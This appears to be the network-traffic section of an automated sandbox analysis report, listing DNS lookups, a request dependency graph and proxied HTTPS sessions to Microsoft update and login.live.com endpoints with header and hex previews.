                                                                                                              Oct 25, 2024 22:23:34.785276890 CEST1.1.1.1192.168.2.160xcd16No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.785861969 CEST1.1.1.1192.168.2.160xb1abNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.785861969 CEST1.1.1.1192.168.2.160xb1abNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.800084114 CEST1.1.1.1192.168.2.160x8a9aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.800084114 CEST1.1.1.1192.168.2.160x8a9aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:35.928690910 CEST1.1.1.1192.168.2.160x378eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:35.928690910 CEST1.1.1.1192.168.2.160x378eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:35.930042982 CEST1.1.1.1192.168.2.160xef88No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:35.930042982 CEST1.1.1.1192.168.2.160xef88No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.103041887 CEST1.1.1.1192.168.2.160x1314No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.103041887 CEST1.1.1.1192.168.2.160x1314No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.103041887 CEST1.1.1.1192.168.2.160x1314No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.104763985 CEST1.1.1.1192.168.2.160xcdb6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.104763985 CEST1.1.1.1192.168.2.160xcdb6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • fs.microsoft.com
                                                                                                              • slscr.update.microsoft.com
                                                                                                              • login.live.com
                                                                                                              • https:
                                                                                                                • www.bing.com
                                                                                                                • r.bing.com
                                                                                                                • fp.msedge.net
                                                                                                                • bx-ring.msedge.net
                                                                                                                • marty-n.com
                                                                                                                • cdn.socket.io
                                                                                                                • mwh06prdapp02-canary-opaph.netmon.azure.com
                                                                                                                • logincdn.msauth.net
                                                                                                                • aadcdn.msauth.net
                                                                                                                • aadcdn.msftauth.net
                                                                                                                • www.w3schools.com

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.1649700184.28.90.27443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: identity
                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                              Host: fs.microsoft.com
                                                                                                              2024-10-25 20:21:41 UTC467INHTTP/1.1 200 OK
                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                              Content-Type: application/octet-stream
                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                              Server: ECAcc (lpl/EF70)
                                                                                                              X-CID: 11
                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                              Cache-Control: public, max-age=159801
                                                                                                              Date: Fri, 25 Oct 2024 20:21:41 GMT
                                                                                                              Connection: close
                                                                                                              X-CID: 2


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.1649701184.28.90.27443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:42 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: identity
                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                              Range: bytes=0-2147483646
                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                              Host: fs.microsoft.com
                                                                                                              2024-10-25 20:21:42 UTC515INHTTP/1.1 200 OK
                                                                                                              ApiVersion: Distribute 1.1
                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                              Content-Type: application/octet-stream
                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                              X-CID: 11
                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                              Cache-Control: public, max-age=159800
                                                                                                              Date: Fri, 25 Oct 2024 20:21:42 GMT
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              X-CID: 2
                                                                                                              2024-10-25 20:21:42 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.164970320.12.23.50443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:45 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mWVXAUOklGATDsF&MD=Pwwdf8r8 HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
                                                                                                              2024-10-25 20:21:45 UTC560INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                              MS-CorrelationId: 1da32175-e68f-42dd-82d1-3b23848b5a3b
                                                                                                              MS-RequestId: 498e3e7a-8df3-48ff-905c-d245605f2257
                                                                                                              MS-CV: u6cNcg9ZoEGNtuIU.0
                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Fri, 25 Oct 2024 20:21:45 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 24490
                                                                                                              2024-10-25 20:21:45 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                              2024-10-25 20:21:45 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.164970740.126.31.69443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:49 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/soap+xml
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                              Content-Length: 3592
                                                                                                              Host: login.live.com
                                                                                                              2024-10-25 20:21:49 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                              2024-10-25 20:21:49 UTC569INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-store, no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                              Expires: Fri, 25 Oct 2024 20:20:49 GMT
                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                              x-ms-route-info: C538_SN1
                                                                                                              x-ms-request-id: f5a74265-876a-4a17-be9c-fe58b01582fc
                                                                                                              PPServer: PPV: 30 H: SN1PEPF0002F156 V: 0
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Date: Fri, 25 Oct 2024 20:21:48 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 11392
                                                                                                              2024-10-25 20:21:49 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.164970840.126.31.69443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:50 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/soap+xml
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                              Content-Length: 4775
                                                                                                              Host: login.live.com
                                                                                                              2024-10-25 20:21:50 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                              2024-10-25 20:21:51 UTC569INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-store, no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                              Expires: Fri, 25 Oct 2024 20:20:50 GMT
                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                              x-ms-route-info: C538_BAY
                                                                                                              x-ms-request-id: 9e752afd-1cdf-4781-abcf-f33f1da0124a
                                                                                                              PPServer: PPV: 30 H: PH1PEPF00011E7F V: 0
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Date: Fri, 25 Oct 2024 20:21:50 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 11412
                                                                                                              2024-10-25 20:21:51 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.164970940.126.31.69443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:52 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/soap+xml
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                              Content-Length: 4775
                                                                                                              Host: login.live.com
                                                                                                              2024-10-25 20:21:52 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                              2024-10-25 20:21:52 UTC569INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-store, no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                              Expires: Fri, 25 Oct 2024 20:20:52 GMT
                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                              x-ms-route-info: C538_BL2
                                                                                                              x-ms-request-id: 928315be-9570-482b-9571-0c52ac8305fd
                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D9FD V: 0
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Date: Fri, 25 Oct 2024 20:21:52 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 11412
                                                                                                              2024-10-25 20:21:52 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.164971040.126.31.69443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:21:54 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/soap+xml
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                              Content-Length: 4762
                                                                                                              Host: login.live.com
                                                                                                              2024-10-25 20:21:54 UTC4762OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                              2024-10-25 20:21:54 UTC569INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-store, no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                              Expires: Fri, 25 Oct 2024 20:20:54 GMT
                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                              x-ms-route-info: C538_BL2
                                                                                                              x-ms-request-id: 51cc7c4c-d3f4-47bb-87b4-dc3f45203b6d
                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D902 V: 0
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Date: Fri, 25 Oct 2024 20:21:53 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 10197
